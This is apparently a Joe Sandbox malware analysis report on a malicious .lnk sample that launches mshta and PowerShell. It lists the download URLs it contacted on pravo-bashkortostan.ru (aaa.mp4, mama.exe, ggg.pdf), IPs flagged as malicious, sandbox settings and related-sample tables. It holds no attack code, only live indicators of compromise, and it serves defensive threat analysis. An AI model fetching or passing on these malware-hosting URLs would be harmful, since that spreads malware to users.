          http://www.aiim.org/pdfua/ns/id/0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/mama.exeu0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4jpqumkz0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4aLMEMPXQp0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4ws0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4D0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4390%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4OOC:0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/ggg.pdfp0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4ll0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4&0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4exeDriverD0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4jdgva0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4Z&0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4(&0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4v0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4jqj0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4private0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4l0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4p0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp40%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4t0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4...0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4130%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp40%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4x0%Avira URL Cloudsafe
          http://pravo-bashkortostan.ru0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/mama.exe0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4N0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/Hl0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4C:0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4H0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortos0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4ational0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4for0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/aaa.mp4(j0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          		199.232.210.172
          		truefalse
            		high
            pravo-bashkortostan.ru
            		150.241.97.10
            		truetrue
              		unknown
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://pravo-bashkortostan.ru/ggg.pdffalse
                • Avira URL Cloud: safe
                		unknown
                https://pravo-bashkortostan.ru/aaa.mp4true
                • Avira URL Cloud: safe
                		unknown
                https://pravo-bashkortostan.ru/mama.exefalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://html4/loose.dtdmama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://pravo-bashkortostan.ru/aaa.mp4$global:?powershell.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.aiim.org/pdfua/ns/id/powershell.exe, 0000000D.00000002.1538124401.00000267B1A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1538124401.00000267B1A66000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.openssl.org/Vmama.exe, 0000002B.00000003.1633314719.000000007EB44000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000002.3797722357.0000000063469000.00000040.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000003.1637182986.000000007EB1A000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://pravo-bashkortostan.ru/aaa.mp4gramFiles(x86)=C:mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://pravo-bashkortostan.ru/aaa.mp4jpqumkzmshta.exe, 00000008.00000003.1628992982.0000016CFFF67000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628815938.0000016CFFF66000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1629166654.0000016CFFF68000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://pravo-bashkortostan.ru/aaa.mp4foigfmshta.exe, 00000008.00000003.1628992982.0000016CFFF67000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628815938.0000016CFFF66000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1629166654.0000016CFFF68000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pravo-bashkortostan.ru/aaa.mp4Dmshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://pravo-bashkortostan.ru/mama.exeupowershell.exe, 0000000D.00000002.1538124401.00000267B1AA3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pravo-bashkortostan.ru/aaa.mp4wspowershell.exe, 00000007.00000002.1285967764.0000019C83A20000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://.cssmama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://pravo-bashkortostan.ru/aaa.mp4aLMEMPXQpmshta.exe, 00000008.00000003.1616777424.0000016CFFDD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1616673537.0000016CFFDD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1618898208.0000016CFFE1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1638082201.0000016CFFE33000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://pravo-bashkortostan.ru/aaa.mp439mshta.exe, 00000008.00000003.1616421550.0000016CFFAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1615879098.0000016CFFAEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1618353859.0000016CFFAFA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://pravo-bashkortostan.ru/ggg.pdfppowershell.exe, 0000000D.00000002.1538124401.00000267B329E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.openssl.org/support/faq.htmlmama.exe, 0000002B.00000003.1629952026.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000002.3797722357.0000000063281000.00000040.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://pravo-bashkortostan.ru/aaa.mp4OOC:mshta.exe, 00000008.00000003.1616777424.0000016CFFDD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1616673537.0000016CFFDD0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pravo-bashkortostan.rupowershell.exe, 0000000D.00000002.1538124401.00000267B329E000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://pravo-bashkortostan.ru/aaa.mp4Z&mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/powershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://pravo-bashkortostan.ru/aaa.mp4&mshta.exe, 00000008.00000002.1636007148.00000164FD64E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pravo-bashkortostan.ru/aaa.mp4(&mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pravo-bashkortostan.ru/aaa.mp4llmshta.exe, 00000008.00000003.1618353859.0000016CFFAFA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1286194255.0000019C8585F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1538124401.00000267B15B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://.jpgmama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://pravo-bashkortostan.ru/aaa.mp4exeDriverDmshta.exe, 00000008.00000002.1636662296.00000164FD840000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4jdgvamshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://pravo-bashkortostan.ru/aaa.mp4vmshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://pravo-bashkortostan.ru/aaa.mp4jqjmshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://pravo-bashkortostan.ru/aaa.mp4privatemshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://pravo-bashkortostan.ru/aaa.mp4tmshta.exe, 00000008.00000002.1636007148.00000164FD669000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1538124401.00000267B17DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://pravo-bashkortostan.ru/aaa.mp4ppowershell.exe, 00000007.00000002.1286194255.0000019C85841000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1538124401.00000267B17DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://go.micropowershell.exe, 0000000D.00000002.1538124401.00000267B261E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://pravo-bashkortostan.ru/aaa.mp4lmshta.exe, 00000008.00000003.1616421550.0000016CFFAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1615879098.0000016CFFAEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1618353859.0000016CFFAFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1575592646.00000267C1626000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.ver)svchost.exe, 0000000C.00000002.2967458082.000001A414EB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4mshta.exe, 00000008.00000003.1628596334.0000016CFFF65000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://pravo-bashkortostan.ru/aaa.mp4...mshta.exe, 00000008.00000002.1637882700.0000016CFFD56000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1538124401.00000267B17DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://pravo-bashkortostan.ru/aaa.mp413mshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://pravo-bashkortostan.rupowershell.exe, 0000000D.00000002.1538124401.00000267B34B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://pravo-bashkortostan.ru/aaa.mp4xmshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://pravo-bashkortostan.ru/Hlmshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.openssl.org/support/faq.htmlRANDmama.exe, 0000002B.00000003.1629952026.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002B.00000002.3797722357.0000000063281000.00000040.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://g.live.com/odclientsettings/Prod-C:svchost.exe, 0000000C.00000003.1321844798.000001A414D5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://pravo-bashkortostan.ru/aaa.mp4Nmshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://pravo-bashkortostan.ru/aaa.mp4C:mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636007148.00000164FD640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortostan.ru/aaa.mp4https://pravo-bashkortosmshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 0000000C.00000003.1321844798.000001A414CE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://pravo-bashkortostan.ru/aaa.mp4Hmshta.exe, 00000008.00000002.1636560896.00000164FD7B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://pravo-bashkortostan.ru/aaa.mp4ationalmshta.exe, 00000008.00000002.1636007148.00000164FD669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000007.00000002.1286194255.0000019C8589C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1286194255.0000019C85887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1538124401.00000267B15B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://pravo-bashkortostan.ru/mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQssh.exe, 00000000.00000002.1638779709.000001EE2F560000.00000004.00000020.00020000.00000000.sdmp, powershell.exetrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://pravo-bashkortostan.ru/aaa.mp4formshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://pravo-bashkortostan.ru/aaa.mp4(jmshta.exe, 00000008.00000003.1630290197.0000016CFFF6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1628596334.0000016CFFF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1630408832.0000016CFFF70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        188.132.183.159
                                                        		unknownTurkey
                                                        		42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRtrue
                                                        206.206.125.221
                                                        		unknownUnited States
                                                        		13332HYPEENT-SJUStrue
                                                        94.131.118.216
                                                        		unknownUkraine
                                                        		29632NASSIST-ASGItrue
                                                        150.241.97.10
                                                        		pravo-bashkortostan.ruSpain
                                                        		207714TECNALIAEStrue

                                                        Private

                                                        IP
                                                        127.0.0.1

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1581224
                                                        Start date and time:2024-12-27 08:46:43 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 10m 28s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:53
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:vreFmptfUu.lnk
                                                        renamed because original name is a hash value
                                                        Original Sample Name:0fd3c13d822c330db0ff496a85ba3d91.lnk
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winLNK@78/73@4/5
                                                        EGA Information:
                                                        • Successful, ratio: 25%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .lnk
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 199.232.210.172, 162.159.61.3, 172.64.41.3, 52.22.41.97, 3.219.243.226, 3.233.129.217, 52.6.155.20, 23.195.39.65, 23.32.238.163, 23.32.238.130, 23.32.238.147, 2.20.40.170, 23.32.238.137, 2.19.198.75, 23.32.238.242, 23.32.238.232, 23.32.238.225, 23.32.238.208, 23.32.238.201, 23.32.238.211, 23.32.238.192, 23.32.238.219, 23.32.238.217, 23.193.114.18, 23.193.114.26, 13.107.246.63, 172.202.163.200
                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                        • Execution Graph export aborted for target mshta.exe, PID 7936 because there are no executed function
                                                        • Execution Graph export aborted for target powershell.exe, PID 180 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        02:47:38API Interceptor3x Sleep call for process: svchost.exe modified
                                                        02:47:40API Interceptor169x Sleep call for process: powershell.exe modified
                                                        02:48:00API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                        02:48:05API Interceptor1x Sleep call for process: WMIC.exe modified
                                                        02:48:45API Interceptor7785305x Sleep call for process: mama.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        bg.microsoft.map.fastly.net54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                        • 199.232.214.172
                                                        C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                        • 199.232.210.172
                                                        P9UXlizXVS.exeGet hashmaliciousAsyncRATBrowse
                                                        • 199.232.214.172
                                                        Setup64v4.1.9.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        0Ty.png.exeGet hashmaliciousXmrigBrowse
                                                        • 199.232.214.172
                                                        0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        yvaKqhmD4L.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        TECNALIAESmipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.95.250
                                                        powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.95.250
                                                        m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 150.241.88.132
                                                        NASSIST-ASGIhttps://reddsuth.outfitsrl.it/?46525SU=4TI90K00DGet hashmaliciousUnknownBrowse
                                                        • 94.131.117.116
                                                        tmpzNIZ0YQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        • 95.164.16.15
                                                        H36NgltNe7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        • 95.164.16.15
                                                        lat0Kwfbuj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        • 95.164.16.15
                                                        Josho.m68k.elfGet hashmaliciousUnknownBrowse
                                                        • 95.164.4.65
                                                        J5uGzpvcAa.elfGet hashmaliciousUnknownBrowse
                                                        • 95.164.4.65
                                                        nPRmTlXhOT.elfGet hashmaliciousUnknownBrowse
                                                        • 95.164.4.65
                                                        OwBugJ5CiC.elfGet hashmaliciousUnknownBrowse
                                                        • 95.164.4.65
                                                        H5LPetzgXV.elfGet hashmaliciousUnknownBrowse
                                                        • 95.164.4.65
                                                        4l9YKCc7qQ.elfGet hashmaliciousUnknownBrowse
                                                        • 95.164.4.65
                                                        HYPEENT-SJUSYvITZPUmfd.ps1Get hashmaliciousUnknownBrowse
                                                        • 206.206.127.152
                                                        K05MQ5BcC8.lnkGet hashmaliciousDucktailBrowse
                                                        • 206.206.126.252
                                                        eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                        • 206.206.126.252
                                                        4YgQ2xN41W.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                                                        • 206.206.126.252
                                                        EERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                        • 206.206.126.252
                                                        cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                        • 206.206.126.252
                                                        O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                        • 206.206.126.252
                                                        SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
